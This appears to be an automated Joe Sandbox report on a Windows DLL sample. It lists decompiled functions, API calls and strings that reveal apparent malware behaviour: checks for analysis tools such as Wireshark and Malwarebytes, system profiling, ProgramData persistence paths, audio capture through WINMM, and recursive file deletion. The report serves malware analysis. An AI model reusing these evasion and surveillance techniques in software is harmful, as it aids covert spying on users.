                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011CA
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInStop), ref: 100011DA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011DD
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInReset), ref: 100011ED
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011F0
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInUnprepareHeader), ref: 10001200
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001203
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInClose), ref: 10001211
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001214
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutReset), ref: 10001224
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001227
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutUnprepareHeader), ref: 10001237
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000123A
                                                          • #825.MFC42(?), ref: 100012C4
                                                          • #825.MFC42(00000000,?), ref: 100012CC
                                                          • #825.MFC42(?,00000000,?), ref: 100012D5
                                                          • #825.MFC42(?,?,00000000,?), ref: 100012DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#825
                                                          • String ID: C$H$KERNEL32.dll$TerminateThread$WINMM.dll$a$d$n$o$s$waveInClose$waveInReset$waveInStop$waveInUnprepareHeader$waveOutClose$waveOutReset$waveOutUnprepareHeader
                                                          • API String ID: 345516743-2415744366
                                                          • Opcode ID: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                          • Instruction ID: 3b114dfad24d7eddf03eb2cbd10a89371148df8dda5889fc91158876db1259a3
                                                          • Opcode Fuzzy Hash: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                          • Instruction Fuzzy Hash: 605143B5904384ABDB10DF74CC88D5B7F98EFD9350F45094DFA8457206DA3AD845CBA1
                                                          Function 1001D150 Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 176stringwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: strstr$Window$IconicTextVisible
                                                          • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                          • API String ID: 4234658395-3439171801
                                                          • Opcode ID: 7f7a1d0f36df41b9a4b5849a32739b8253b0e5d148341f86a0cc87d4ab0c3121
                                                          • Instruction ID: 8cebbb76e65a9180966719af1c6f36493ba5cc3a2661010a80882127fb923e92
                                                          • Opcode Fuzzy Hash: 7f7a1d0f36df41b9a4b5849a32739b8253b0e5d148341f86a0cc87d4ab0c3121
                                                          • Instruction Fuzzy Hash: 0B518379A0031676D604F6748DC4ACB36D8EF5458AF064C3EF899DA040F739EB8996A3
                                                          Function 1001B250 Relevance: 54.5, APIs: 18, Strings: 13, Instructions: 271stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetVersionExA.KERNEL32 ref: 1001B28C
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A98A
                                                            • Part of subcall function 1001A8F0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9C4
                                                            • Part of subcall function 1001A8F0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9D4
                                                            • Part of subcall function 1001A8F0: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9E4
                                                            • Part of subcall function 1001A8F0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9EB
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A9F8
                                                            • Part of subcall function 1001A8F0: gethostname.WS2_32(?,?), ref: 1001AA00
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001AA07
                                                          • getsockname.WS2_32(?), ref: 1001B2F6
                                                          • GetSystemInfo.KERNEL32(?,?,?,00000100,?,00000010,00000004), ref: 1001B363
                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B384
                                                          • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3CF
                                                          • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3EA
                                                          • GetTickCount.KERNEL32 ref: 1001B496
                                                          • wsprintfA.USER32 ref: 1001B4B8
                                                          • wsprintfA.USER32 ref: 1001B4DF
                                                          • wsprintfA.USER32 ref: 1001B504
                                                          • wsprintfA.USER32 ref: 1001B52B
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B54C
                                                            • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAA6
                                                            • Part of subcall function 1001AA20: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAE3
                                                            • Part of subcall function 1001AA20: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAF3
                                                            • Part of subcall function 1001AA20: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB03
                                                            • Part of subcall function 1001AA20: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB0A
                                                            • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB11
                                                          • lstrcpyA.KERNEL32(?,?,?,00000100), ref: 1001B5B9
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B5C9
                                                          • GetLastInputInfo.USER32(?), ref: 1001B5E3
                                                          • GetTickCount.KERNEL32 ref: 1001B5E9
                                                          • _access.MSVCRT ref: 1001B608
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B62B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$lstrlen$lstrcpywsprintf$CloseCountCreateFreeHandleInfoLibraryReadSizeTick$AddressDiskDriveGlobalInputLastLoadMemoryProcSpaceStatusSystemTypeVersion_accessgethostnamegetsockname
                                                          • String ID: %$@$C:\ProgramData\jerrt.txt$D$Default$a$d$e$f$f$l$t$u
                                                          • API String ID: 429165215-739913618
                                                          • Opcode ID: 93d7cf506a966ca3d239304d62bae69cb5e5d56ae30ef9a7664d40add3c0b94f
                                                          • Instruction ID: bba6ecf1fe8d0bd6771c84150094faf2fd0a31ada7f7fe5f254ba2cb99b7a38b
                                                          • Opcode Fuzzy Hash: 93d7cf506a966ca3d239304d62bae69cb5e5d56ae30ef9a7664d40add3c0b94f
                                                          • Instruction Fuzzy Hash: 00A19DB55083859FD724CB68CC84BDFBBE9EBC8304F444A1DF58987241EB75A648CB62
                                                          Function 1001D4A0 Relevance: 52.8, APIs: 24, Strings: 6, Instructions: 290sleepsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,?,?,10098BF2,000000FF), ref: 1001D4C8
                                                          • sprintf.MSVCRT ref: 1001D4E7
                                                            • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001D540
                                                          • GetFileAttributesA.KERNEL32(?), ref: 1001D595
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001D5AB
                                                          • wsprintfA.USER32 ref: 1001D5D2
                                                          • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001D5E7
                                                          • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001D5F3
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D601
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D608
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                            • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                            • Part of subcall function 1001D390: EnumWindows.USER32(1001D150,?), ref: 1001D3A0
                                                          • Sleep.KERNEL32(000003E8), ref: 1001D64B
                                                          • Sleep.KERNEL32(000186A0), ref: 1001D665
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D67F
                                                          • GetTickCount.KERNEL32 ref: 1001D681
                                                          • GetTickCount.KERNEL32 ref: 1001D6AC
                                                          • GetTickCount.KERNEL32 ref: 1001D6F1
                                                          • GetTickCount.KERNEL32 ref: 1001D735
                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D758
                                                          • GetTickCount.KERNEL32 ref: 1001D77B
                                                          • Sleep.KERNEL32(00000096,?,00000001), ref: 1001D79A
                                                          • GetTickCount.KERNEL32 ref: 1001D7B7
                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7C5
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7DA
                                                          • #825.MFC42(?), ref: 1001D866
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CountTick$Create$AttributesFileMutex$#825CloseD@2@@std@@D@std@@DirectoryEnumErrorEventGrow@?$basic_string@HandleLastObjectReleaseSingleStartupU?$char_traits@V?$allocator@WaitWindowssprintfsrandtimewsprintf
                                                          • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive1$MyService1$e
                                                          • API String ID: 287845118-1910566113
                                                          • Opcode ID: f3c80545078a190987055d02f112db2d30d9695f12345d236837f794450a6666
                                                          • Instruction ID: 8c7ded9c6ceec9eca41422dcd1451c7b47c1199f62d6f7257f0d10dd3eb8ab53
                                                          • Opcode Fuzzy Hash: f3c80545078a190987055d02f112db2d30d9695f12345d236837f794450a6666
                                                          • Instruction Fuzzy Hash: F5A1B1351083418FE320FF748C85B9EB7E4EB85744F44492DF9899B281EB75E949CB62
                                                          Function 1001DA70 Relevance: 51.0, APIs: 23, Strings: 6, Instructions: 284sleepsynchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001D890: GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                            • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D8C3
                                                            • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D904
                                                            • Part of subcall function 1001D890: isdigit.MSVCRT ref: 1001D93C
                                                            • Part of subcall function 1001D890: memmove.MSVCRT(?,?), ref: 1001D95D
                                                          • CreateThread.KERNEL32(00000000,00000000,1001D4A0,00000000,00000000,00000000), ref: 1001DAA4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,10098C22,000000FF), ref: 1001DAB4
                                                          • sprintf.MSVCRT ref: 1001DAD3
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001DB2C
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1001DB4F
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                            • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                          • GetFileAttributesA.KERNEL32(?), ref: 1001DB83
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001DB99
                                                          • wsprintfA.USER32 ref: 1001DBC0
                                                          • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001DBD5
                                                          • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001DBE1
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBEF
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBF6
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DC3A
                                                          • GetTickCount.KERNEL32 ref: 1001DC40
                                                          • GetTickCount.KERNEL32 ref: 1001DC67
                                                          • GetTickCount.KERNEL32 ref: 1001DCAC
                                                          • GetTickCount.KERNEL32 ref: 1001DCF0
                                                          • GetTickCount.KERNEL32 ref: 1001DD0E
                                                          • Sleep.KERNEL32(00000064,?,00000001), ref: 1001DD2A
                                                          • GetTickCount.KERNEL32 ref: 1001DD46
                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD54
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD69
                                                          • #825.MFC42(?), ref: 1001DE12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountTick$Create$Sleep$CloseD@2@@std@@D@std@@FileHandleMutexU?$char_traits@V?$allocator@strrchr$#825AttributesDirectoryEos@?$basic_string@ErrorEventGrow@?$basic_string@LastModuleNameObjectReleaseSingleStartupThreadWaitisdigitmemmovesprintfsrandtimewsprintf
                                                          • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive$MyService$e
                                                          • API String ID: 4188121392-1841343700
                                                          • Opcode ID: f32a2ccd1ab71fbf8ef5ddea4480b4d3ab1966c981617cd67936b966bb15a630
                                                          • Instruction ID: 559cf9057b97644e8b87333c0e59f2f7267fda61bbf3804e65adc10e60db3a1c
                                                          • Opcode Fuzzy Hash: f32a2ccd1ab71fbf8ef5ddea4480b4d3ab1966c981617cd67936b966bb15a630
                                                          • Instruction Fuzzy Hash: 66A1E5751083419BE320FF68CC85BABB7E4EF95744F04091DF9898B291DB75E988C762
                                                          Function 100029D0 Relevance: 42.3, APIs: 19, Strings: 5, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event
                                                          • String ID: /*/$C:\ProgramData\Microsoft Drive\De.ini$Loop stopped as 1.txt does not exist.$Received command to stop loop. De.ini deleted.$jieshuxunhuan
                                                          • API String ID: 4201588131-4242312597
                                                          • Opcode ID: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                          • Instruction ID: 368dbf102333d3f33aab7b414df493a5988d33fb55c3cd96ca69a7f772dd8b24
                                                          • Opcode Fuzzy Hash: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                          • Instruction Fuzzy Hash: 2771F7B5604209AFF340DF389C81D9F77DCEF95295F040629F98E93246EB21F94897A2
                                                          Function 1000BD50 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 207fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                          • ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                          • ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                          • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                          • _strcmpi.MSVCRT ref: 1000BE80
                                                          • _strcmpi.MSVCRT ref: 1000BE97
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BEB3
                                                          • #825.MFC42(?), ref: 1000BF08
                                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BF2D
                                                          • DeleteFileA.KERNEL32(?), ref: 1000BF42
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 1000BF7B
                                                          • FindClose.KERNEL32(00000000), ref: 1000BF8A
                                                          • RemoveDirectoryA.KERNEL32(?), ref: 1000BF98
                                                          • #825.MFC42(?), ref: 1000BFBA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$D@2@@0@FileFindHstd@@Tidy@?$basic_string@V10@V?$basic_string@$#825_strcmpi$?append@?$basic_string@CloseDeleteDirectoryEos@?$basic_string@FirstFreeze@?$basic_string@Grow@?$basic_string@NextRemoveV12@Xran@std@@
                                                          • String ID: *.*
                                                          • API String ID: 2724700886-438819550
                                                          • Opcode ID: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                          • Instruction ID: 3864407029e8fe6deab90730e0e99c0bea179ee7459791ed1101209935cd539f
                                                          • Opcode Fuzzy Hash: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                          • Instruction Fuzzy Hash: F371E2754087859FE710DF24CC94AEEBBE4FB84380F444A2DF985872A5DB31A909CF52
                                                          Function 10002340 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 194windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 10002357
                                                          • PostQuitMessage.USER32(00000000), ref: 10002387
                                                          • SetWindowLongA.USER32(?,000000EB,?), ref: 100023A9
                                                          • GetModuleHandleA.KERNEL32(00000000,00000066), ref: 100023B3
                                                          • LoadIconA.USER32(00000000), ref: 100023BA
                                                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 100023C4
                                                          • DestroyWindow.USER32(?), ref: 100023EA
                                                          Strings
                                                          • %s %d/%d/%d %d:%02d:%02d %s, xrefs: 10002513
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
